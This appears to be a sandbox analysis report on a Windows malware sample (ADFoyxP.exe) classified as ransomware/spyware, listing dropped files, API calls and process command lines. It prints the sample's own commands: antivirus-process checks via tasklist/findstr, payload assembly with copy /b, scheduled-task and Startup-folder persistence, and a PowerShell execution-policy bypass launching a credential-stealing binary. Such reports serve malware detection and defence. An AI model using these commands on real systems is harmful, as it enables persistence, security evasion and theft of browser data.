Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00849FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,23_2_00849FD2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Gate.pub entropy: 7.9966611885
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Preference.pub entropy: 7.99684640346
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Apartments.pub entropy: 7.99764085482
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Republican.pub entropy: 7.99632178366
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Amenities.pub entropy: 7.99702026084
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Worcester.pub entropy: 7.99796554729
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Generating.pub entropy: 7.99807030539
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Regulation.pub entropy: 7.99630322854
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Performing.pub entropy: 7.99750792054
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Robert.pub entropy: 7.99725695551
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Argentina.pub entropy: 7.99765353495
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Distinguished.pub entropy: 7.99809266375
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Poem.pub entropy: 7.99733876431
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Governor.pub entropy: 7.99796220639
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Swingers.pub entropy: 7.99812528823
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Legislation.pub entropy: 7.99786443988
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Explicitly.pub entropy: 7.99686467774
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Comparison.pub entropy: 7.99674290091
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Enlarge.pub entropy: 7.99778287234
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Listening.pub entropy: 7.99720925196
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Maintains.pub entropy: 7.99814457245
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Document.pub entropy: 7.99688077856
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Confusion.pub entropy: 7.99759203123
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Reverse.pub entropy: 7.99813463449
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Vacation.pub entropy: 7.99753681116
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Vampire.pub entropy: 7.99666754967
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Blood.pub entropy: 7.99804267671
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Hell.pub entropy: 7.99698268184
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Breaks.pub entropy: 7.99810429407
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Concept.pub entropy: 7.99720276963
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Really.pub entropy: 7.99835078472
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Urban.pub entropy: 7.99778737709
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Trademarks.pub entropy: 7.99757414761
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Thousand.pub entropy: 7.99729046263
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Silly.pub entropy: 7.99829492948
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Both.pub entropy: 7.99806131353
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\Bull.pub entropy: 7.99770447322
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\353090\m entropy: 7.99992399201
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations\F entropy: 7.99992399201
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99602810784

System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00824763: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 23_2_00824763
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00811B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 23_2_00811B4D
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_0081F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 23_2_0081F20D
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\PerfectlyFda
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\AccreditationShed
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\GovernmentsHighly
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\HighKerry
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\PracticalPrevent
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\FilenameWho
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Windows\UpdatedMakeup
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D8017 23_2_007D8017
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007CE144 23_2_007CE144
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007BE1F0 23_2_007BE1F0
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007EA26E 23_2_007EA26E
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007B22AD 23_2_007B22AD
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D22A2 23_2_007D22A2
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007CC624 23_2_007CC624
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007EE87F 23_2_007EE87F
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_0083C8A4 23_2_0083C8A4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00822A05 23_2_00822A05
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007E6ADE 23_2_007E6ADE
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00818BFF 23_2_00818BFF
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007CCD7A 23_2_007CCD7A
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007DCE10 23_2_007DCE10
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007E7159 23_2_007E7159
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007B9240 23_2_007B9240
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00845311 23_2_00845311
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007B96E0 23_2_007B96E0
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D1704 23_2_007D1704
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D1A76 23_2_007D1A76
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007B9B60 23_2_007B9B60
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D7B8B 23_2_007D7B8B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D1D20 23_2_007D1D20
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D7DBA 23_2_007D7DBA
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_007D1FE7 23_2_007D1FE7
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: String function: 004062A3 appears 57 times
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: String function: 007D0DA0 appears 46 times
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: String function: 007CFD52 appears 40 times
Source: ADFoyxP.exe | Static PE information: invalid certificate
Source: curcuma.exe.26.dr | Static PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
Source: curcuma.exe.26.dr | Static PE information: Number of sections : 11 > 10
Source: ADFoyxP.exe, 00000000.00000002.1650753368.0000000000960000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs ADFoyxP.exe
Source: ADFoyxP.exe, 00000000.00000003.1648850593.000000000095E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs ADFoyxP.exe
Source: ADFoyxP.exe, 00000000.00000003.1648351362.0000000000959000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs ADFoyxP.exe
Source: ADFoyxP.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ADFoyxP.exe | Static PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: classification engine | Classification label: mal100.rans.spyw.expl.evad.mine.winEXE@110/160@24/27
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_008241FA GetLastError,FormatMessageW, 23_2_008241FA
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00812010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 23_2_00812010
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00811A0B AdjustTokenPrivileges,CloseHandle, 23_2_00811A0B
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_0081DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 23_2_0081DD87
Source: C:\Users\user\Desktop\ADFoyxP.exe | Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com | Code function: 23_2_00823A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 23_2_00823A0E
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Program Files\scoped_dir8680_1554559384
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | File created: C:\Users\user\AppData\Local\TradeSecure Innovations
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8304:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Mutant created: \Sessions\1\BaseNamedObjects\filemanager1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8304:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5048:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2952:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\KzwgQiLBsKNC8MJ0zZKWm7EQADmHtlQcAqGCr8Sw14/KL57tXLJJZTjsUP4ab24f22LPEwrDGtXSF6zdOKZ5wg==
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:304:WilStaging_02
Source: C:\Users\user\Desktop\ADFoyxP.exe | File created: C:\Users\user\AppData\Local\Temp\nswDC84.tmp
Source: C:\Users\user\Desktop\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: ADFoyxP.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\Desktop\ADFoyxP.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\ADFoyxP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C23000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEED9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: ADFoyxP.exe | ReversingLabs: Detection: 13%
Source: ADFoyxP.exe | Virustotal: Detection: 35%
Source: C:\Users\user\Desktop\ADFoyxP.exe | File read: C:\Users\user\Desktop\ADFoyxP.exe
Source: unknown | Process created: C:\Users\user\Desktop\ADFoyxP.exe "C:\Users\user\Desktop\ADFoyxP.exe"
Source: C:\Users\user\Desktop\ADFoyxP.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\353090\Seat.com Seat.com m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F"
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.com | Process created: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\curcuma.exe "C:\Users\user\AppData\Local\Temp\curcuma.exe"
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2184,i,15394741629772577023,2250770724390570129,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2204 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\curcuma.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7206107532581912577,15538010115052324354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,6174276244726584004,9219914870614864987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:8
Source: C:\Users\user\Desktop\ADFoyxP.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\expand.exe expand Go.pub Go.pub.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 353090
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Really.pub
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "posted" Good
